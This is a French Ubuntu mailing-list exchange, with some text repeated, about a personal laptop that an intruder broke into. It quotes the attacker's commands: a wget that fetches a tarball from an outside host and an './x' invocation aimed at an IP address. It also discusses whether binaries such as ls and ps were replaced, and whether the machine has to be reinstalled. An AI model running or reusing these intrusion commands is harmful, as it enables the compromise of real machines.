On 3/27/06, L. Boggio <[EMAIL PROTECTED]> wrote:
Je pense que je l'ai interrompu et qu'il était au début du processus et en effet, les scripts sont lisibles... donc je vais plutôt tenter d'analyser ce qu'il y a la dedans.
Oui je sais lire le C et un peu de bash.
Pas beaucoup Perl par contre...
Et je doute qu'il a pu passer root selon les petites recherches que j'ai fait donc remplacer ls etc... j'ai un fort doute.
Le 27/03/06, Free Mind a dit :
> Ma machine c'est mon portable perso qui me sert pour toutes sortes de
> tests. Je sais pour la dapper en production... mais j'aime bien avoir les
> dernières version des logiciels aussi.
Bon, désolé, mais avec ces 2 lignes :
wget http://rooot.xhost.ro/fld.tgz
et
./x 200.68.192.253 53 0
On a la preuve qu'il a téléchargé un programme et qu'il l'a exécuté,
donc, tu ne peux pas savoir ce qu'il a fait.
De ce fait, tu ne peux plus rien croire dans ta machine : LS a pu être
remplécé, PS a pu être remplacé, etc...
Si tu es parano et/ou que tu as des choses sensibles, la SEULE solution
sure est la réinstallation après formatage de ta machine :(
Je pense que je l'ai interrompu et qu'il était au début du processus et en effet, les scripts sont lisibles... donc je vais plutôt tenter d'analyser ce qu'il y a la dedans.
Oui je sais lire le C et un peu de bash.
Pas beaucoup Perl par contre...
Et je doute qu'il a pu passer root selon les petites recherches que j'ai fait donc remplacer ls etc... j'ai un fort doute.
-- ubuntu-fr mailing list ubuntu-fr@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-fr
